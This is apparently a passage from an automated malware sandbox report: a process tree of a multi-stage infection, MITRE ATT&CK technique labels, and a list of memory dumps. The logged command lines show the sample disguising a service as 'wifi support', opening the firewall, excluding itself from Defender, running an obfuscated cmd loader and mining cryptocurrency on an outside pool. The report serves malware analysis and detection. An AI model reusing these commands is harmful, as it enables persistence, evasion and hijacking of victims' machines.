- Suspicious use of WriteProcessMemory
PID:1092
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dtwmlorz\
  2⤵
  PID:628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ubecddth.exe" C:\Windows\SysWOW64\dtwmlorz\
  2⤵
  PID:548
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create dtwmlorz binPath= "C:\Windows\SysWOW64\dtwmlorz\ubecddth.exe /d\"C:\Users\Admin\AppData\Local\Temp\EBC7.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:968
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description dtwmlorz "wifi internet conection"
  2⤵
  PID:972
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start dtwmlorz
  2⤵
  PID:1964
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:2000

C:\Users\Admin\AppData\Local\Temp\F4EC.exe
C:\Users\Admin\AppData\Local\Temp\F4EC.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:664
- C:\Users\Admin\AppData\Local\Temp\ced07b10-6160-4028-beae-8e4d81774ee0\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\ced07b10-6160-4028-beae-8e4d81774ee0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ced07b10-6160-4028-beae-8e4d81774ee0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:1476
- - C:\Users\Admin\AppData\Local\Temp\ced07b10-6160-4028-beae-8e4d81774ee0\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\ced07b10-6160-4028-beae-8e4d81774ee0\AdvancedRun.exe" /SpecialRun 4101d8 1476
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\F4EC.exe" -Force
  2⤵
  PID:1328
- C:\Users\Admin\AppData\Local\Temp\F4EC.exe
  "C:\Users\Admin\AppData\Local\Temp\F4EC.exe"
  2⤵
  - Executes dropped EXE
  PID:1728
- C:\Users\Admin\AppData\Local\Temp\F4EC.exe
  "C:\Users\Admin\AppData\Local\Temp\F4EC.exe"
  2⤵
  - Executes dropped EXE
  PID:1008
- C:\Users\Admin\AppData\Local\Temp\F4EC.exe
  "C:\Users\Admin\AppData\Local\Temp\F4EC.exe"
  2⤵
  - Executes dropped EXE
  PID:1976

C:\Windows\SysWOW64\dtwmlorz\ubecddth.exe
C:\Windows\SysWOW64\dtwmlorz\ubecddth.exe /d"C:\Users\Admin\AppData\Local\Temp\EBC7.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1904
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2028
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:2648

C:\Users\Admin\AppData\Local\Temp\1134.exe
C:\Users\Admin\AppData\Local\Temp\1134.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1992
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1134.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632931887 " AI_EUIMSI=""
  2⤵
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
  PID:372

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1304
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 49BADF74F1A4DC9FBBDC0589A9D7A359 C
  2⤵
  - Loads dropped DLL
  PID:1964
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 38EA8533F3F5A785C717E15B3B3C57FC
  2⤵
  - Loads dropped DLL
  PID:1420
- C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe
  "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"
  2⤵
  PID:2440

C:\Users\Admin\AppData\Local\Temp\1E30.exe
C:\Users\Admin\AppData\Local\Temp\1E30.exe
1⤵
- Executes dropped EXE
PID:1904

C:\Users\Admin\AppData\Local\Temp\2A70.exe
C:\Users\Admin\AppData\Local\Temp\2A70.exe
1⤵
- Executes dropped EXE
PID:972

C:\Users\Admin\AppData\Local\Temp\3D26.exe
C:\Users\Admin\AppData\Local\Temp\3D26.exe
1⤵
- Executes dropped EXE
PID:2284
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c cmd < Disegnato.accdt
  2⤵
  PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    PID:2356
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^jdBXEbiICLfWHIEKiKDpCGJMhheipdUFFbTuIYbnunkESZAKxLCvDshGHOJdxqnjRKspPbwohtetxtThNsMbNbwgpjnTfutuZYMoIdVXJxpmgpkCUcCehqnzJrZDZoTuqWycaLEb$" Sottrarre.accdt
      4⤵
      PID:2368
  - - C:\Users\Admin\AppData\Roaming\Mio.exe.com
      Mio.exe.com W
      4⤵
      PID:2380
    - - C:\Users\Admin\AppData\Roaming\Mio.exe.com
        
        C:\Users\Admin\AppData\Roaming\Mio.exe.com W
        5⤵
        
        PID:2492
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2392

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/524-59-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/524-61-0x0000000075D11000-0x0000000075D13000-memory.dmp

Filesize
8KB

Download
memory/528-215-0x0000000000A50000-0x0000000000A7A000-memory.dmp

Filesize
168KB

Download
memory/528-121-0x0000000004810000-0x0000000004811000-memory.dmp

Filesize
4KB

Download
memory/528-113-0x00000000012E0000-0x00000000012E1000-memory.dmp

Filesize
4KB

Download
memory/664-134-0x0000000005440000-0x00000000054B9000-memory.dmp

Filesize
484KB

Download
memory/664-106-0x0000000000640000-0x0000000000641000-memory.dmp

Filesize
4KB

Download
memory/664-101-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/972-231-0x00000000047F3000-0x00000000047F4000-memory.dmp

Filesize
4KB

Download
memory/972-226-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/972-227-0x00000000047F1000-0x00000000047F2000-memory.dmp

Filesize
4KB

Download
memory/972-230-0x00000000047F2000-0x00000000047F3000-memory.dmp

Filesize
4KB

Download
memory/972-220-0x00000000004A0000-0x00000000004BF000-memory.dmp

Filesize
124KB

Download
memory/972-224-0x00000000002B0000-0x00000000002E0000-memory.dmp

Filesize
192KB

Download
memory/972-232-0x00000000047F4000-0x00000000047F6000-memory.dmp

Filesize
8KB

Download
memory/972-222-0x0000000001FB0000-0x0000000001FCE000-memory.dmp

Filesize
120KB

Download
memory/1092-105-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1092-104-0x0000000000220000-0x0000000000233000-memory.dmp

Filesize
76KB

Download
memory/1220-85-0x0000000003B30000-0x0000000003B45000-memory.dmp

Filesize
84KB

Download
memory/1220-63-0x0000000003AF0000-0x0000000003B05000-memory.dmp

Filesize
84KB

Download
memory/1304-153-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

Filesize
8KB

Download
memory/1328-204-0x0000000006050000-0x0000000006051000-memory.dmp

Filesize
4KB

Download
memory/1328-199-0x0000000005650000-0x0000000005651000-memory.dmp

Filesize
4KB

Download
memory/1328-223-0x0000000006230000-0x0000000006231000-memory.dmp

Filesize
4KB

Download
memory/1328-177-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

Filesize
4KB

Download
memory/1328-180-0x0000000004860000-0x0000000004861000-memory.dmp

Filesize
4KB

Download
memory/1328-181-0x00000000024D0000-0x00000000024D1000-memory.dmp

Filesize
4KB

Download
memory/1328-206-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1328-207-0x00000000060A0000-0x00000000060A1000-memory.dmp

Filesize
4KB

Download
memory/1328-218-0x00000000061C0000-0x00000000061C1000-memory.dmp

Filesize
4KB

Download
memory/1328-185-0x0000000004822000-0x0000000004823000-memory.dmp

Filesize
4KB

Download
memory/1328-184-0x0000000004820000-0x0000000004821000-memory.dmp

Filesize
4KB

Download
memory/1328-189-0x00000000052D0000-0x00000000052D1000-memory.dmp

Filesize
4KB

Download
memory/1516-93-0x0000000002260000-0x0000000002261000-memory.dmp

Filesize
4KB

Download
memory/1516-89-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/1516-91-0x0000000000470000-0x00000000004C1000-memory.dmp

Filesize
324KB

Download
memory/1516-92-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/1680-82-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1680-79-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1680-84-0x0000000004340000-0x0000000004341000-memory.dmp

Filesize
4KB

Download
memory/1712-75-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/1712-78-0x0000000004B40000-0x0000000004B41000-memory.dmp

Filesize
4KB

Download
memory/1904-187-0x0000000000300000-0x0000000000390000-memory.dmp

Filesize
576KB

Download
memory/1904-130-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1904-188-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/1976-173-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1976-186-0x0000000002030000-0x0000000002031000-memory.dmp

Filesize
4KB

Download
memory/1976-178-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2000-62-0x00000000001B0000-0x00000000001B9000-memory.dmp

Filesize
36KB

Download
memory/2028-131-0x00000000000C0000-0x00000000000D5000-memory.dmp

Filesize
84KB

Download